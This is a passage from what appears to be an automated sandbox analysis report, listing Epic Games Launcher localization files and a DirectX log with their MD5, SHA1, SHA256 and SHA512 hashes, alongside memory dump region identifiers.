| SHA1 | cfad7e3b03106cec4678ab39cac25fbfb34dd5df |
| SHA256 | 03ea59d7659ee65e93d76e0744b1a0497d63bc278692f2a85cfe54a1f8d7f1a9 |
| SHA512 | df6c166aeae11ba470f588f2f7fb096493c74ec973ac25a21d354f92fa775189f487ef639bb31d59de64b4fab68b4045f1e3267d029ed612feaa57f2fdb5495f |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\zone\en_ZM.res
| MD5 | 584b7ed10634a00ed0e4f58e9404cd0f |
| SHA1 | f167a677fbc727a61d5ac6a326cf1f2eaa8e6073 |
| SHA256 | d3e4b494d598c2c08dcdbb9379b164c95158bb673aae0ad789124f46170937f3 |
| SHA512 | f32c2e4fd559487d4b3e8a67392d5989ec99212453e1afa2dcbbd22ab69c3e21c589790653d357a5c048c670e2961a1810af3718823038ba9523164478468d0e |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\pt_ST.res
| MD5 | 1ebd2cf7b1b1688edba5e6481651878d |
| SHA1 | d7475c1e2105a5316f89bad639102a22e59e8206 |
| SHA256 | 8840adebc3abc62843f8e6350f2e28528a3ca15d65fa9979bed3bf44566867a9 |
| SHA512 | 208ef55200983034d2e782b061c3c065e60832cb443d5b4cfdbe9297d338e9867089b7f26fd2a7bd7c25bdd11e8b5c7c7bdaa77a409dc679a931256ca038aa0a |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\curr\en_IE.res
| MD5 | f290c99a3e9c928023e949819dfe38ee |
| SHA1 | e24ac7970af336c9455b5211bf1b865237d46e05 |
| SHA256 | 6dd348d1795c7e999a650b6cbf254544f9d62ebe48f53230334bc0d6fa44d47d |
| SHA512 | 873c23e1aea6243172bd8f8efa2cb1ed8580e1def84764cc05a3638118d4c01f17f8f51967dc050c903727cb1784c4ea01d274a45c4969d9fe1e7efb881a0379 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\fr_SY.res
| MD5 | 4cf3aa31b641864ab60ef738b2b9903a |
| SHA1 | 92db1cf0b23b8d187b404b1693c3841f16152bda |
| SHA256 | 4d2bbe1d4d9d0a4266448241596bca9da40a34d96e4fd309a205350156de0134 |
| SHA512 | e7e01ab79ce30f51b69b1c7094c325d55e08da3703c05ed0741b05d30b2c4d662587338141aa5bf6ee9015ce1dff2094982a40ba58f4abca7cf3e8c1a954e2ec |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\ar_BH.res
| MD5 | ae6774ad1b4e487d0992d22700f9087f |
| SHA1 | 46b5c49c76a7106f33bfa9bb13ec5b0f50eff50b |
| SHA256 | dc359b3a630dab0a5b4e728806547747fc25105b70abd3b22e8bff20a3995ef5 |
| SHA512 | 095b725d6f78b78a8f77dfa461b716a480219a969efc8246045bc0b93a18ba1377bc17bf4ff99b390038db71db3a387c4b6c658f858b735a897d41ce6c34ce79 |
memory/6928-3950-0x00000207B7440000-0x00000207B7460000-memory.dmp
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\pt_TL.res
| MD5 | 606dd5e86352cba8a2a4f4561837824b |
| SHA1 | 5c0059f5cbdd887fb652fa79ad87aac0f8865ea8 |
| SHA256 | 3a85bade8a7a6db69c28c9388ef247294248df06f9d9d406198479426b31d70c |
| SHA512 | 66c908320950530c345997b522e12d7d6603df931fe32b43644a2ddfa12be7795c9582c070adb744fbde9df287816fc8584f5f1a2bc2158abd8bfc9ba4b20e0c |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\curr\vai_Vaii.res
| MD5 | a60e02569784ac9d5c76e3021322c822 |
| SHA1 | 471960a6448f26bf0216f28f071e3860f1d6a271 |
| SHA256 | 338496ad90df4581131f024dd945f5d7455f0b9969ea0c924e9f1bc142083b18 |
| SHA512 | a2d57f8efbe4e5d0b50faf54c6c44ceecf0ade4577872af3cace9df64d1733a68325494694b03e3517877560bf12cc124f662aaddf8c1f68b97862e75fc0cef2 |
memory/6928-4019-0x00000207B7800000-0x00000207B7820000-memory.dmp
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\unit\sr_Cyrl.res
| MD5 | 85a6974221a7807b04c9e016b6c8904c |
| SHA1 | 421c17e072a104975c29e5c4a51575c5a9542489 |
| SHA256 | 939c1da1c4ed3e97227cfc94d46bacdfbbb8d2bff721ec42618b641db731ad3d |
| SHA512 | eadbc62801b0d5aba4b9a2bbdf469f007493fe613e04b640aa511383a4e3d707ac0adcff3e5d80f1598090e12cd65c5985dfcdf0cf8d46af807bad00204182cc |
memory/6928-3992-0x00000207B7400000-0x00000207B7420000-memory.dmp
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\unit\sr_YU.res
| MD5 | 88ca5d2b5f3baa53f32d1a17affb3cc4 |
| SHA1 | b603ef247d2e23125e79c34f3695b44853a2024e |
| SHA256 | 413c50ef83d5a3ff6c6f693e50594ff033a0301dcb807c2ad1efdeb25fcb7642 |
| SHA512 | be26d85b7ea633275de857127a7e8891fe0bd1eb66ba33e83ee6b652a76c0618bf052da6a43fb9e21394941732d9805dc2fb801a5065b7ee8cda6ea77ff3914d |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\rwk.res
| MD5 | 2dc65410add51f24840be253b3de1e6a |
| SHA1 | 555d4e6eb7c777e657dc6fa511950b6a31426ba1 |
| SHA256 | e8647fd90a97c6c221deabe0e4e4f833e3b726c9424091695e2419045d7f2b60 |
| SHA512 | 01bec81c93895a11fdb507bcfe01386d0d590e20827aad4ab59ce50e25de3074801996fd2b3ac9d8231af80049dc5ecaab8e3ad38ae8fd9b4135706cdc53f60f |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\unit\pa_Arab.res
| MD5 | 6a9273af56e5d1f6f2d24203334ddf9b |
| SHA1 | bd7ca1cb1ba90b6036803043b8e351e6ec499da5 |
| SHA256 | f1d94fcb430e36370fa030c9d9892214dcb624289bc5282d432bf2a49378a08c |
| SHA512 | 066cc289321c632ca0657aac15f9f0e121c506b3ebd752e19277a5087417430e3c40525e0b410b930ef3a238328906aa64bf2a53b0febb26724918333c500508 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\pa_Guru.res
| MD5 | 7b02e28612fbff1a60da141244aef706 |
| SHA1 | 78065b63c9d24feaa1f72752a39d3977449bce1e |
| SHA256 | 15b23903878e867c7f8638b46048ffcbb245789c344bc16986851a7227687909 |
| SHA512 | ea8c726496990c7fd4958181650b21b89fce23c5250e76bfc3b7d23acf827196791c312f96ff71d5fd0f90b03603646c26b3b31232d6fa2630492c4a315552f5 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\vai_Vaii.res
| MD5 | a0838e6d15b5072dc03baeb7f98ed41a |
| SHA1 | 98ab23737463e55ada302d75545a9bb32be19272 |
| SHA256 | 825e5f4187683fe01e0fff595d7cb7cab8654c5699f0d8386e6c3625a5e3b19f |
| SHA512 | b4f64fa488f5af2465e5f986c7b505df49c23166c022e13dbe764047833735551f67c2f3dacdfff46a30847e8303df96270471f990ac48353e6a5baacafc3d2a |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\lang\sr_Cyrl.res
| MD5 | c2d04d672f4df81cff4bceead9be3750 |
| SHA1 | 21413dc219200658c148c7adc2a3c47e7d4c3ffd |
| SHA256 | ddd8f7540d9a540ea6967bf394fddaf7262d47fd2484d4467cb4d2c747b6dd32 |
| SHA512 | 6a15d00e02638fae576327c856aa81a476fb76621febf62bf1160d6afd8fd7e5ceaf12fe7cce072bb45e0d371ed5be67b3059a19a45f0e7d452564475d69b598 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\region\sr_Cyrl_YU.res
| MD5 | 5c56677a0822b6f922124f4e4ae5a625 |
| SHA1 | d1a78f3f6f949ca8c8593dfd24a8c248642bbf38 |
| SHA256 | 7d0e61f3ca3dae5bb75aaf6318bde4f128da9662fe1d75fc245f5d4b5e4188ce |
| SHA512 | 0090c31c35af1b6718f4db3fe7aa2e6f06240b7895df417ff9500e08c66a9f9d98095378558131c2d96ea129fdc7df30be876f4b18b887872b0addfa9c3a59a8 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\lang\sr_RS.res
| MD5 | 522cc1a65a354bc4ac2119c3ee5177e2 |
| SHA1 | 5ff152aa8dec7e82399d07d29d1dc12be874f985 |
| SHA256 | fd32948fd9cec6e575bb7e29a4102cdbf852ec752cf47399a028d04528c489b3 |
| SHA512 | e95d63da5e61069be80017cbd7be335ec4a80d44a1acf9638c697b13817a832d8bfa7afcb562f3d9c36df13de27366c78ba0866bb9e463f5af455ae0983e385e |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\zone\sr_Cyrl_YU.res
| MD5 | 7a74fc755d1e0d6d48cd5b4c2361592b |
| SHA1 | f35ee9e8b2b8ad42d48265ab5f32617b664a77fe |
| SHA256 | 028a167d99b424b29176736eafd35631bacf7a4f087e765c6e244cef0d12203e |
| SHA512 | be38f81fe8d53b9fa2adad5d2b403dae7e6223f6aa4438f5ddd5c3be3b88795a720e90197a96263dc8251abc10f96a7c5e987dbea84a00cb88f60394278f54f6 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\sr_CS.res
| MD5 | 03b4c2777b2ab020f0301b1f57b4486c |
| SHA1 | 1a8fe984f91940e6a8b86f9433bc64ce5d875b87 |
| SHA256 | 2001732718d567eddb29306e39fe186be95cd30bea89a14a5cffda73c6e95539 |
| SHA512 | d7ff5c4032bb90e9123b3054783ded9abac3b1413da8e01f80bfcf0a07169ce7992b89454c839b3f5d1d4633b5ade2ab093a68e9ff09aa825e9303c371929859 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\curr\sr_YU.res
| MD5 | a1a03e4ae0bb3120daa7f925f9754736 |
| SHA1 | 244855f29a028c974b0e908cd8e4cee11f65e56c |
| SHA256 | fd67c6594b5413b30f3d04973480904ec2179107b767666c37a8a55c90918ea6 |
| SHA512 | 04c5b3ffb40b64422f94929e0181879cb7de1e8d07d5b2c59aca1e5e88a33503ba3a6e377c064c5675d0522c49f6853bd28e5141b9227846336f2686d551e987 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\curr\uz_Latn.res
| MD5 | 1960ad3959332481f6d916f056b52339 |
| SHA1 | cea9c67afc66f20e4104cb6aa2df781bccadfd5a |
| SHA256 | dcb5a6234f2f38bece4039140f59ea549c5cef8191cda68fdae9d5b6106d9b4f |
| SHA512 | c7be9fb55877d5418afb221f94f131e02a2c88c55216e2a1b9967b3dde70b47336d8878b97cb64228a7ddda55dc4665517f1f8e8df2b997e2895afe62f9a3986 |
C:\Program Files (x86)\Epic Games\Launcher\Engine\Content\Internationalization\icudt64l\zone\zh_Hans.res
| MD5 | cbf1e43602d294e22f60cdefffbe1133 |
| SHA1 | e9b337c3ee0c3fe63b741faa70a51fb5a8475970 |
| SHA256 | 968f1197df1b8b6f2ff8113b28253086818ea2c8e21c049509dc10d50adeb7f8 |
| SHA512 | 66979d342beba1c32521f3797499c19fa3895e8efe74ae6e50caac65aa72b282180bb3be55ad6b4a479c393e992f88f0f12b4d2b5429fefd5681076d519041eb |
memory/6928-5074-0x000001FFB4600000-0x000001FFB5F2F000-memory.dmp
C:\Windows\Logs\DirectX.log
| MD5 | 8fb341dc2c9b462e9055aadc89bd9a1e |
| SHA1 | 8e80b7c0b2b50138edb4f70d516d66130cac433e |
| SHA256 | 280bc380746718a0b42b30c37808825bdd50024681fb5e45ece33856c619efcb |
| SHA512 | 12324297c31e4c6a622e542dc89e262e09691401ff0bc1544cc3832b80a8adf68e8b0d790e4aed3b227ca96f9448b32d49f97a0020db354142fc08faae12dc9b |
memory/4928-5312-0x000001EB99320000-0x000001EB99340000-memory.dmp
memory/4928-5314-0x000001EB992E0000-0x000001EB99300000-memory.dmp
memory/4928-5316-0x000001EB99900000-0x000001EB99920000-memory.dmp